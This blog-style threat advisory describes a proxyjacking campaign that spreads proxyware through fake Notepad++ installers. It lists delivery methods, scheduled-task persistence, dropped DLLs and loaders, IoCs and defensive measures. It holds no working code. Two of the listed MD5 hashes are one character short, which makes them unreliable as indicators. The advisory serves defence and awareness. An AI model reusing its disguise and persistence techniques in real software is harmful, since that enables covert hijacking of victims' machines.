Ticker

6/recent/ticker-posts

Proxyware / Notepad++-Disguised Malware Campaign (2026)

Shan May 25, 2026

Threat Type: Proxyware Malware (Proxyjacking)
Severity: Medium

Overview

A new malware campaign has been observed distributing proxyware-based malware disguised as legitimate software installers such as Notepad++ or other common utility tools.

The attackers use fake download portals, cracked software sites, and malicious advertisements to trick users into installing trojanized setup files.

Once installed, the malware silently converts infected systems into proxy nodes. These systems are then abused to route external internet traffic for the attacker’s financial gain. This technique is known as proxyjacking.

What is Proxyware Malware?

Proxyware is software that shares a device’s internet bandwidth with a remote network. In legitimate cases, users may opt-in for rewards.

In this attack:

  • Proxyware is installed without user consent

  • The system’s bandwidth is hijacked

  • Attacker monetizes victim network traffic

  • User has no visibility of usage

Infection Chain (How the Attack Works)

The infection follows a structured multi-stage process:

1. Initial Delivery

Attackers distribute malicious files through:

  • Fake software download websites

  • Cracked software distribution pages

  • Malicious ads (malvertising campaigns)

  • Compromised installer bundles

Common file names include:

  • Setup.msi

  • Setup.zip

2. Execution and Installation

Once the user runs the file:

  • The installer mimics legitimate software behavior

  • It silently installs background components

  • Creates persistence mechanisms in the system

3. Persistence Setup

The malware ensures long-term access using Windows Task Scheduler:

  • Notepad Update Scheduler

  • UNBScheduler

  • UNPScheduler

These tasks automatically restart the malware even after reboot.

4. Payload Deployment

The installer drops secondary components such as:

  • DPLoader (loader module)

  • Infatica proxyware agent

  • DigitalPulse proxy module

  • Obfuscated JavaScript or Python scripts

  • DLL-based components like infatica_agent.dll and TextShaping.dll

5. Execution Chain

The malware often uses PowerShell to:

  • Download additional payloads

  • Install NodeJS runtime

  • Decrypt embedded scripts

  • Execute hidden proxy modules

This allows attackers to run the system as a proxy node without detection.

Indicators of Compromise (IoCs)

File Hashes

  • MD5 / SHA variants observed in campaigns include:

    • 01f6153a34ab6974314cf96cced9939

    • f05e27d1d0d1e24a93fc72c8cf88924f

    • 80fe7854726d18bbc48a5370514c58b

    • ea171e48e5eeae673c41c82292e984ba

Persistence Artifacts

  • Scheduled Tasks:

    • UNBScheduler

    • UNPScheduler

    • Notepad Update Scheduler

Malicious Files

  • Setup.msi

  • Setup.zip

  • infatica_agent.dll

  • TextShaping.dll

Impact of Infection

Systems affected by this malware may experience:

  • Unauthorized internet bandwidth usage

  • High network traffic without user activity

  • Reduced system performance

  • Background communication with attacker C2 servers

  • Possible secondary malware installation

  • Increased risk of full system compromise

Security Best Practices

To reduce risk from proxyware and similar malware:

  • Download software only from official vendor websites

  • Avoid cracked or pirated software sources

  • Keep operating systems and applications fully updated

  • Block execution from %APPDATA% and %TEMP% directories

  • Disable or restrict PowerShell and WScript usage where possible

  • Enable PowerShell logging and centralized log monitoring

  • Use application whitelisting or Software Restriction Policies

  • Block risky file types: .exe, .bat, .js, .vbs, .scr, .dll

  • Disable unused RDP services or secure them behind firewalls

  • Implement email filtering with SPF, DKIM, and DMARC

  • Use offline backups for critical systems

  • Segment internal networks to isolate sensitive assets

  • Deploy ad-blocking tools to reduce malvertising exposure

Detection and Monitoring

Organizations should monitor for:

  • Unexpected outbound proxy traffic

  • High bandwidth usage from idle systems

  • Unknown scheduled tasks

  • PowerShell execution anomalies

  • Suspicious DLL loading activity

  • NodeJS or scripting runtime installations without approval

External References

Conclusion

This proxyware campaign demonstrates a growing trend of malware abusing trusted software brands to gain initial access. The attack relies heavily on user deception, fake installers, and silent persistence techniques.

Strong software hygiene, strict download policies, and endpoint monitoring are key controls to prevent compromise.

Shan

Posted by Shan

Post a Comment

0 Comments